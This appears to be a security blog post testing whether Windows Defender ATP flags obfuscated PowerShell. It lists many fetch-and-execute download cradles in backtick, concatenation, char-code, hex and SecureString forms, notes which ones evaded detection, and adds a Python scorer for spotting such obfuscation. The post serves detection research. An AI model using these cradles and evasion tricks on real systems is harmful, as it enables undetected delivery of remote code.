While testing Windows Defender Advanced Threat Protection (WDATP), I ran various PowerShell scripts to invoke certain downloads or specific tasks. As I was doing it, I wondered if it was smart enough to see obfuscated commands. Then I wondered how I could obfuscate them to make them harder to understand.
As an example, I will use the following command line with a made-up URL:
Invoke-Expression (New-Object System.Net.WebClient).DownloadString("https://bit.ly/sample")
The command simply retrieves the file at the specified URL and loads it into the current PowerShell session. WDATP easily recognizes the standard form of the command and flags it. What if we try a few different obfuscation approaches? The examples used below are taken from: http://rvasec.com/slides/2017/Bohannon_Daniel–RVAsec_2017.pptx
Easy Obfuscation
Invoke-Expression (New-Object Net.WebClient).DownloadString("htt" + "ps://" + "bit.ly/sample")
Invoke-Expression (New-Object Net.WebClient).DownloadString('htt' + 'ps://' + 'bit.ly/sample')
Invoke-Expression (New-Object Net.WebClient)."`D`o`wn`l`oa`d`Str`in`g"('htt' + 'ps://' + 'bit.ly/sample')
Medium Obfuscation
Invoke-Expression (New-Object Net.WebClient)."`D`o`w`N`l`o`A`d`S`T`R`i`N`g"('htt' + 'ps://' + 'bit.ly/sample')
Invoke-Expression (New-Object "`N`e`T`.`W`e`B`C`l`i`e`N`t")."`D`o`w`N`l`o`A`d`S`T`R`i`N`g"('htt' + 'ps://' + 'bit.ly/sample')
Invoke-Expression (& (`G`C`M *w-O*) "`N`e`T`.`W`e`B`C`l`i`e`N`T")."`D`o`w`N`l`o`A`d`S`T`R`i`N`g"( 'ht'+'tps://' + 'bit.ly/sample')
Hard Obfuscation
`I`N`V`o`k`e`-`E`x`p`R`e`s`s`i`o`N (& (`G`C`M *w-O*) "`N`e`T`.`W`e`B`C`l`i`e`N`T")."`D`o`w`N`l`o`A`d`S`T`R`i`N`g"( 'ht'+'tps://bit.ly/sample')
. ((${`E`x`e`c`u`T`i`o`N`C`o`N`T`e`x`T}."`I`N`V`o`k`e`C`o`m`m`A`N`d"). "`N`e`w`S`c`R`i`p`T`B`l`o`c`k"((& (`G`C`M *w-O*) "`N`e`T`.`W`e`B`C`l`i`e`N`T")."`D`o`w`N`l`o`A`d`S`T`R`i`N`g"( 'ht'+'tps://bit.ly/sample')))
Interestingly, I did not see these get flagged and show up in the console. However, when I ran it this way it did:
powershell -nop -c "iex(New-Object Net.WebClient).DownloadString('http://bit.ly/sample')"
Even using the "Invoke-Obfuscation" framework with something like the following three didn't raise the alert.
ASCII Encoding
[StRiNg]::JoIn( '' , [ChaR[]](73, 110, 118 ,111,107,101, 45 , 69, 120 ,112, 114 , 101, 115 ,115 , 105,111, 110,32,40,78 , 101 ,119, 45, 79 , 98 ,106 , 101 , 99 ,116, 32 , 83, 121,115 , 116, 101,109 , 46 , 78 , 101 ,116, 46,87,101, 98 ,67 ,108,105,101 , 110, 116,41 , 46, 68 , 111 , 119, 110 ,108 ,111, 97,100 ,83 , 116 , 114, 105 ,110, 103, 40 ,39, 104 ,116 , 116, 112 ,58,47,47 ,98 , 105,116,46 , 108 , 121, 47 , 115, 97, 109 , 112,108, 101 ,39, 41 ))|& ((gv '*MDr*').NamE[3,11,2]-joiN'')
HEX Encoding
&( $sHeLlId[1]+$SHeLLiD[13]+'x')(( ( 49, '6e' , 76, '6f','6b', 65,'2d',45 , 78, 70, 72,65 , 73, 73,69, '6f' , '6e' ,20,28,'4e' ,65 , 77, '2d', '4f' ,62, '6a', 65,63 ,74 , 20 , 53 , 79,73 ,74,65,'6d','2e','4e' , 65 ,74 , '2e' , 57,65, 62,43,'6c' ,69, 65,'6e', 74,29 ,'2e', 44 , '6f' , 77, '6e','6c' , '6f' ,61, 64, 53,74 , 72 ,69 , '6e' , 67, 28, 27, 68 , 74,74, 70 , '3a' , '2f' , '2f',62 , 69, 74 ,'2e' , '6c', 79,'2f' ,73, 61 , '6d' , 70 ,'6c',65, 27, 29)|foreAcH-objeCt {([COnvERT]::tOiNT16(( $_.TOSTrinG()), 16 )-as [chAR])} ) -JOin '')
SecureString (AES) Encoding
.( $PsHOMe[4]+$PsHoMe[34]+'x')(([ruNtiMe.inteROpseRViCes.MaRsHaL]::ptRtoStRinGuNi( [RuNTime.iNTERoPservIcES.marSHAL]::SecureStrinGToGLoBalaLLocuniCoDE($('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'| cOnVeRTTo-secUrestRING -KE (242..227)) )) ))
SecureString (AES) Encoding Compressed
(new-oBJect iO.COMPRESsiOn.deflATESTreAM( [Io.MEMoRyStreAm][SYStEm.convert]::FROmbASE64stRing('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'), [iO.CoMPresSiON.cOMPresSIoNmoDE]::dEcoMPreSs) |fOrEAch{ new-oBJect Io.sTREAmReadER($_ ,[SYSteM.tExT.eNcODinG]::AsciI) } ).readtoEND( ) | & ( ([sTRInG]$VErBOSeprEFerENCE)[1,3]+'x'-Join'')
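The tricks in the easy/medium/hard samples and the Invoke-Obfuscation samples above (backtick-split member names, string concatenation, char-code arrays joined with -join '', indirect invocation through & and gcm, mixed-case cmdlet names) all leave traces that a defender can score once PowerShell script block logging or command-line telemetry is collected. The following Python is an added example, not code from this post, from WDATP or from Invoke-Obfuscation; its indicator weights and threshold are assumptions, and the sample command lines are constructed from the forms shown above.

```python
import re

# Weighted indicators for the tricks shown above (backtick splitting, string
# concatenation, char-code arrays, -join '', indirect invocation). The weights
# and the threshold are assumptions of this example, not a vendor's scoring.
INDICATORS = [
    ("backtick_split", re.compile(r"[A-Za-z]`[A-Za-z]"), 3),             # D`o`w`N
    ("string_concat", re.compile(r"'[^']*'\s*\+\s*'"), 2),               # 'htt' + 'ps://'
    ("char_array", re.compile(r"\[char(\[\])?\]\s*\(", re.I), 4),         # [ChaR[]](73,...)
    ("numeric_run", re.compile(r"(\d{2,3}\s*,\s*){6,}"), 3),             # 73,110,118,...
    ("join_empty", re.compile(r"-join\s*''", re.I), 2),                  # -joiN''
    ("indirect_call", re.compile(r"[&.]\s*\("), 2),                      # & (gcm *w-O*)
    ("decoder", re.compile(r"toint16|frombase64string|securestring", re.I), 2),
    ("cradle", re.compile(r"\biex\b|invoke-expression|downloadstring", re.I), 1),
]

def mixed_case_tokens(cmd: str) -> int:
    """Count words (backticks removed) whose case flips more often than not, e.g. StRiNg."""
    count = 0
    for tok in re.findall(r"[A-Za-z]{4,}", cmd.replace("`", "")):
        flips = sum(a.isupper() != b.isupper() for a, b in zip(tok, tok[1:]))
        if flips > len(tok) // 2:
            count += 1
    return count

def score(cmd: str):
    """Return (total score, list of indicator names) for one logged command line."""
    total, hits = 0, []
    for name, pattern, weight in INDICATORS:
        if pattern.search(cmd):
            total, hits = total + weight, hits + [name]
    mixed = mixed_case_tokens(cmd)
    if mixed:
        total, hits = total + 2 * mixed, hits + [f"mixed_case_x{mixed}"]
    return total, hits

def is_obfuscated(cmd: str, threshold: int = 5) -> bool:
    return score(cmd)[0] >= threshold

# Constructed sample command lines modelled on the forms above (not real logs).
SAMPLES = {
    "plain": "Invoke-Expression (New-Object Net.WebClient).DownloadString('https://bit.ly/sample')",
    "backtick": r"""Invoke-Expression (New-Object Net.WebClient)."`D`o`w`N`l`o`A`d`S`T`R`i`N`g"('htt' + 'ps://' + 'bit.ly/sample')""",
    "chararray": r"""[StRiNg]::JoIn('', [ChaR[]](73,110,118,111,107,101,45,69))|& ((gv '*MDr*').NamE[3,11,2]-joiN'')""",
    "benign": r"Get-ChildItem C:\Users -Recurse | Where-Object { $_.Length -gt 1MB }",
}

if __name__ == "__main__":
    for label, cmd in SAMPLES.items():
        total, hits = score(cmd)
        print(f"{label:10} score={total:2} obfuscated={is_obfuscated(cmd)} {hits}")
```

The plain cradle scores low here on purpose: it is the form a signature catches, while the scorer targets the transformations that hide it.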
To learn more about obfuscating PowerShell commands you can use the following links:
https://github.com/danielbohannon/Invoke-Obfuscation
https://www.sans.org/summit-archives/file/summit-archive-1492186586.pdf
https://blog.varonis.com/powershell-obfuscation-stealth-through-confusion-part-i/
https://blog.varonis.com/powershell-obfuscation-stealth-confusion-part-ii/
http://pentestit.com/invoke-obfuscation-powershell-command-script-obfuscator/
https://cobbr.io/ObfuscationDetection.html
https://gallery.technet.microsoft.com/scriptcenter/Generate-obfuscated-string-6ec72ffe
Now the good news is that if these were more malicious in nature than just downloading a file, they would be flagged. For example, using this method to download "Mimikatz" will trigger an alert.